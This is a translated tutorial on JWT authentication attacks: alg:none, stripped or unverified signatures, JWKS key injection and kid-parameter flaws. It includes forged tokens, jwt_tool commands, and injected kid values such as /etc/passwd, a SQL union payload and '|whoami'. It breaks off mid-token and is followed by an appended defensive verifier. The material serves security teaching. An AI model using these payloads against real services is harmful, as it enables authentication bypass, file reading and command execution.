
Title: Summary of detailed explanation of JWT authentication attacks


0x01 JWT Basics

1. Introduction to JWT

JWT stands for JSON Web Token. It uses JSON objects as carriers to transmit information and is usually used for identity authentication and information exchange. A JWT can be signed with a secret key (HMAC algorithm) or with an RSA or ECDSA public/private key pair.

2. JWT format

Whenever a user accesses a resource on the site, the corresponding request carries the token in a header, by default Authorization: jwt. JWT tokens start with eyJ.

A JWT is divided into three parts: header (Header), payload (Payload) and signature (Signature). The three parts are separated by periods (.), and the content of the JWT is encoded with Base64URL. Here is an example of a specific token:

eyJraWQiOiJrZXlzLzNjM2MyZWExYzNmMTEzZjY0OWRjOTM4OWRkNzFiODUxIiwidHlwIjoiSldUIiwiYWxnIjoiUlMyNTYifQ.eyJzdWIiOiJkdWJoZTEyMyJ9.XicP4pq_WIF2bAVtPmAlWIvAUad_eeBhDOQe2MXwHrE8a7930LlfQq1lFqBs0wLMhht6Z9BQXBRos9jvQ7eumEUFWFYKRZfu9POTOEE79wxNwTxGdHc5VidvrwiytkRMtGKIyhbv68duFPI68Qnzh0z0M7t5LkEDvNivfOrxdxwb7IQsAuenKzF67Z6UArbZE8odNZAA9IYaWHeh1b4OUG0OPM3saXYSG-Q1R5X_5nlWogHHYwy2kD9v4nk1BaQ5kHJIl8B3Nc77gVIIVvzI9N_klPcX5xsuw9SsUfr9d99kaKyMUSXxeiZVM-7os_dw3ttz2f-TJSNI0DYprHHLFw

(1) Header

The header contains information about the JWT configuration, such as the signature algorithm (alg), the token type (JWT), or the key file used by the algorithm (used when the server needs multiple key files).

Header: eyJraWQiOiJrZXlzLzNjM2MyZWExYzNmMTEzZjY0OWRjOTM4OWRkNzFiODUxIiwidHlwIjoiSldUIiwiYWxnIjoiUlMyNTYifQ

base64 decoding: {'kid':'keys/3c3c2ea1c3f113f649dc9389dd71b851','typ':'JWT','alg':'RS256'}

Here the token type is JWT and the signature algorithm is RS256.

(2) Payload

The payload is used to store user data, such as a username (test123).

Payload: eyJzdWIiOiJkdWJoZTEyMyJ9

(3) Signature

The signature is computed over the encoded header and payload with a key we provide, using the signature algorithm specified in the header, usually RS256 (RSA, asymmetric, signed with the private key) or HS256 (HMAC SHA256, symmetric). The purpose of the signature is to ensure that the JWT has not been tampered with. Here is an example of code that uses HS256 to generate the JWT signature:

HMACSHA256(base64urlEncode(header) + '.' + base64urlEncode(payload), secret)

Signature: XicP4pq_WIF2bAVtPmAlWIvAUad_eeBhDOQe2MXwHrE8a7930LlfQq1lFqBs0wLMhht6Z9BQXBRos9jvQ7eumEUFWFYKRZfu9POTOEE79wxNwTxGdHc5VidvrwiytkRMtGKIyhbv68duFPI68Qnzh0z0M7t5LkEDvNivfOrxdxwb7IQsAuenKzF67Z6UArbZE8odNZAA9IYaWHeh1b4OUG0OPM3saXYSG-Q1R5X_5nlWogHHYwy2kD9v4nk1BaQ5kHJIl8B3Nc77gVIIVvzI9N_klPcX5xsusw9SsUfr9d99kaKyMUSXxeiZVM-7os_dw3ttz2f-TJSNI0DYprHHLFw

0x02 JWT Common Security Issues

1. The signature algorithm can be modified to none (CVE-2015-9235)

JWT supports setting the algorithm to "None". If the "alg" field is set to "None", then the signature will be empty, so any token is valid.

Method 1: the original payload data is not changed, and the attack relies on the server not checking the signature algorithm.

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczpcL1wvZGVtby5zam9lcmRsYW5na2VtcGVyLm5sXC8iLCJpYXQiOjE2NjI3Mzc5NjUsImV4cCI6MTY2MjczOTE2NSwiZGF0YSI6eyJoZWxsbyI6IndvcmxkIn19.LlHtXxVQkjLvW8cN_8Kb3TerEEPm2-rAfnwZ_h0pZBg

The token can be inspected at https://jwt.io/

Use jwt_tool to attack (this tool is suitable for obtaining a token with no signing algorithm without changing the original payload data):

python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczpcL1wvZGVtby5zam9lcmRsYW5na2VtcGVyLm5sXC8iLCJpYXQiOjE2NjI3Mzc5NjUsImV4cCI6MTY2MjczOTE2NSwiZGF0YSI6eyJoZWxsbyI6IndvcmxkIn19.LlHtXxVQkjLvW8cN_8Kb3TerEEPm2-rAfnwZ_h0pZBg -X a

Token obtained:

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJpc3MiOiJodHRwczovL2RlbW8uc2pvZXJkbGFuZ2tlbXBlci5ubC8iLCJpYXQiOjE2NjI3Mzc5NjUsImV4cCI6MTY2MjczOTE2NSwiZGF0YSI6eyJoZWxsbyI6IndvcmxkIn19.

Use the obtained token in an authentication request to confirm: http://demo.sjoerdlangkemper.nl/jwtdemo/hs256.php

Method 2: the original payload data is changed, again relying on the unchecked signature algorithm. Use Python 3's pyjwt module to modify the data in the payload, and use the none vulnerability to regenerate the token:

import jwt

encoded=jwt.encode({'iss': 'https://demo.sjoerdlangkemper.nl/','iat': 1662737965,'exp': 1662739165,'data': {'hello': 'admin' }}, '', algorithm='none')

encoded

'eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJpc3MiOiJodHRwczovL2RlbW8uc2pvZXJkbGFuZ2tlbXBlci5ubC8iLCJpYXQiOjE2NjI3Mzc5NjUsImV4cCI6MTY2MjczOTE2NSwiZGF0YSI6eyJoZWxsbyI6ImFkbWluIn19.'

Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJpc3MiOiJodHRwczovL2RlbW8uc2pvZXJkbGFuZ2tlbXBlci5ubC8iLCJpYXQiOjE2NjI3Mzc5NjUsImV4cCI6MTY2MjczOTE2NSwiZGF0YSI6eyJoZWxsbyI6ImFkbWluIn19.

Fix: the JWT configuration should specify only the required signature algorithm.

2. Signature not verified

Some servers do not verify the JWT signature. You can modify the payload and send the token as it is, or delete the signature and send the token again, to see whether it is still accepted.

Modify the payload data with the online tool jwt.io.

Then use the obtained token in an authentication request:

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL2RlbW8uc2pvZXJkbGFuZ2tlbXBlci5ubC8iLCJpYXQiOjE2NjI3Mzc5NjUsImV4cCI6MTY2MjczOTE2NSwiZGF0YSI6eyJoZWxsbyI6ImFkbWlucyJ9fQ.Sv4QGoIbSQSP7Yeha2Qbhk10za6z42UqdZuv1IUmPnU

Or delete the signature and request authentication with the token again:

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL2RlbW8uc2pvZXJkbGFuZ2tlbXBlci5ubC8iLCJpYXQiOjE2NjI3Mzc5NjUsImV4cCI6MTY2MjczOTE2NSwiZGF0YSI6eyJoZWxsbyI6ImFkbWlucyJ9fQ.

Fix: the JWT configuration should specify only the required signature algorithm.

3. JWKS public key injection: forged key (CVE-2018-0114)

Create a new RSA key pair and inject a JWKS file: the attacker signs the token with the new private key, includes the public key in the token, and then lets the service use that key to verify the token. The attacker can forge the JWT by deleting the original signature, adding a new public key to the header, and then signing with the private key associated with that public key.

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw

python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw -X i

Token obtained:

eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImp3ayI6eyJrdHkiOiJSU0EiLCJraWQiOiJqd3RfdG9vbCIsInVzZSI6InNpZyIsImUiOiJBUUFCIiwibiI6IjFQZDNGTXBFUVM0SU15WjJ4Tlh5UEJrdnRCWnBEZG8wakFGTEtwemdfSEM1ZE1vU3ZRR1pDWVpwZlJpMlpaTDZoUkNFNW9DUWRHeGd0MzZQZVV2MERhTG8zLVJacGtzcFhpT3QzWU00RDU3SDdvQllEWVExcFh1dHNBRzliaXJ6SENGM2l0alg1S0Zha2ljTkw5cGsySnloRDRTU1BoOUVQMkNQVHExMV9sV1o1N1ZacGFMdDJxLXB1THQ3SWNSYnhmbEhlaUZxRTlUSUtnRW1scExBVjBRajFiWEk3bVhMZEQxT0NyS2w0SDdqbEFlWG5LY0xQTEJnb2Y4RzBTeXRGSU1PN1BvQVpUZUVHVHJiZmktNlZKNGNrcUNfdjJYQUR1WHBTSU5mOFBrbXZXckdjTk1XaEEwVXZvcVJCdnFHR0ZBWnBRT2dhR1VUVktvdzJOTXllUSJ9fQ.eyJsb2dpbiI6InRpY2FycGkifQ.JGqsWHbZaas_4DAfbtkK-DOBpueDrWw3tZuBonKUleIoa_Ll6yMrwzvJ0RjqMH2hIlhKrixTce7RtJPiqEJAHv_5eMF5G3qkU2jDbM6Un19dlTRTBfCh3FIKMrkh1P-CUUw7AXO2cae1GWNvGK74d3VNulgBK5Qy4uZryrzJUO-7Dx5vHUfV3eJ8J-FRRFqDO_DYAjB7cbWHuB4RHcUkIwJ9Fz3ze5JIKMXrcmZIEvCssUxjaYIb7Rpm-lI34yWSQbOGA82glkt4xqjulZZqF7Eysu1Q3JNUqPiD24T1zrE7CHm3btpBzW4CSRPrs8z5E-GUgZApH_vodp3mLxa9tA

Fix: the JWT configuration should clearly define which public keys to accept for verification.

4. Empty signature (CVE-2020-28042)

Delete the signature from the end of the token:

python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw -X n

Token obtained:

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.

Fix: the JWT library should fix this problem.

4. Sensitive information leakage

Base64-decoding the JWT header can leak sensitive data such as key files or passwords, or expose injection vulnerabilities.

eyJraWQiOiJrZXlzLzNjM2MyZWExYzNmMTEzZjY0OWRjOTM4OWRkNzFiODUxIiwidHlwIjoiSldUIiwiYWxnIjoiUlMyNTYifQ

base64 decoding: {'kid':'keys/3c3c2ea1c3f113f649dc9389dd71b851','typ':'JWT','alg':'RS256'}

Here the token type is JWT, the signature algorithm is RS256, and kid specifies the key used by the algorithm. The key path given by kid is keys/3c3c2ea1c3f113f649dc9389dd71b851k, so search for /key/3c3c2ea1c3f113f649dc9389dd71b851k and /key/3c3c2ea1c3f113f649dc9389dd71b851k.pem

5. KID Parameter Vulnerability

(1) Arbitrary file read

The key ID (kid) is an optional header of string type. It identifies a specific key present in the file system or database, whose contents are then used to verify the signature. This parameter is helpful if there are multiple keys for signing tokens, but it can be dangerous if it is injectable, because the attacker can point it at a specific file whose content is predictable. The kid parameter is used to read the key file, but the system cannot tell whether the file the user asks for really is a key file. Therefore, if the parameter is not filtered, the attacker can read any file in the system.

{ 'typ': 'JWT', 'kid': '/etc/passwd', 'alg': 'HS256'}

token: eyJ0eXAiOiJKV1QiLCJraWQiOiIvZXRjL3Bhc3N3ZCIsImFsZyI6IkhTMjU2In0.eyJsb2dpbiI6InRpY2FycGkifQ.CPsfiq-_MnwM7dF6ZZhWPl2IbKgF447Iw6_EgRp6PFQ

Note: on a Linux system, /dev/null is called the null device file and never returns anything. It can be used for the bypass through arbitrary file read:

python3 jwt_tool.py JWT -I -hc kid -hv '././dev/null' -S hs256 -pc login -pv 'ticarpi'

Parameter description: -I injects or updates the current claims, -hc kid selects kid in the existing header, -hv sets its value to '././dev/null', -pc sets the name of the payload claim (here login), and -pv sets the value of the claim login to 'ticarpi'.

Alternatively, you can use any file present in the web root directory, such as a CSS or JS file, and use its content to verify the signature:

python3 jwt_tool.py -I -hc Kid -hv 'path/of/the/file' -S hs256 -p 'file content'

(2) SQL injection

kid can also be used to fetch the key from a database, in which case it may allow SQL injection: a constructed SQL statement can obtain data or bypass signature verification.

{ 'typ': 'JWT', 'kid': 'key1111111111' || union select 'secretkey' --', 'alg': 'HS256'}

token: eyJ0eXAiOiJKV1QiLCJraWQiOiJrZXkxMTExMTExMScgfHwgdW5pb24gc2VsZWN0ICdzZWNyZXRrZXknIC0tIiwiYWxnIjoiSFMyNTYifQ.eyJsb2dpbiI6InRpY2FycGkifQ.I2oD_v7UvBIqilLcyuqP_HDY28yp1IFZeTs90fk-Tdc

(3) Command injection

Command injection arises when the kid parameter is not strictly filtered, but the conditions for exploiting it are relatively strict. If the server backend uses Ruby and uses the open function when reading the key file, command injection may be caused by a constructed parameter.

{ 'typ': 'JWT', 'kid': 'keys/3c3c2ea1c3f113f649dc9389dd71b851k|whoami', 'alg': 'HS256'}

token: eyJ0eXAiOiJKV1QiLCJraWQiOiJrZXlzLzNjM2MyZWExYzNmMTEzZjY0OWRjOTM4OWRkNzFiODUxa3x3aG9hbWkiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI
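The fixes named above (pin the signature algorithm, require a signature, accept only known keys, constrain kid) combined in one server-side verifier. This is an added example, not code from the original post or from any JWT library; the key store KEYS, the kid value key-2022-09 and the secret are constructed for illustration.

```python
import base64, hashlib, hmac, json

# Constructed demo key store: kid -> HMAC secret. The kid is only ever a dict
# key, so it never reaches a file path, a SQL query or a shell command.
KEYS = {"key-2022-09": b"constructed-demo-secret-not-for-production"}
ALLOWED_ALG = "HS256"  # pinned by the server, never chosen by the token


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(part: str) -> bytes:
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def sign(header: dict, payload: dict, secret: bytes) -> str:
    """Issue an HS256 token; used here to build constructed test input."""
    parts = [b64url_encode(json.dumps(p).encode()) for p in (header, payload)]
    mac = hmac.new(secret, ".".join(parts).encode(), hashlib.sha256).digest()
    return ".".join(parts + [b64url_encode(mac)])


def verify(token: str) -> dict:
    """Return the payload, or raise ValueError naming the check that failed."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header = json.loads(b64url_decode(parts[0]))
    if not isinstance(header, dict):
        raise ValueError("malformed header")
    if header.get("alg") != ALLOWED_ALG:      # rejects none, None, RS256, ...
        raise ValueError("algorithm not allowed")
    if "jwk" in header or "jku" in header:    # never trust a key the token supplies
        raise ValueError("embedded key not allowed")
    kid = header.get("kid")                   # exact match against the allow-list
    secret = KEYS.get(kid) if isinstance(kid, str) else None
    if secret is None:
        raise ValueError("unknown kid")
    if not parts[2]:
        raise ValueError("empty signature")
    expected = hmac.new(secret, f"{parts[0]}.{parts[1]}".encode(),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(parts[2])):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(parts[1]))
```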
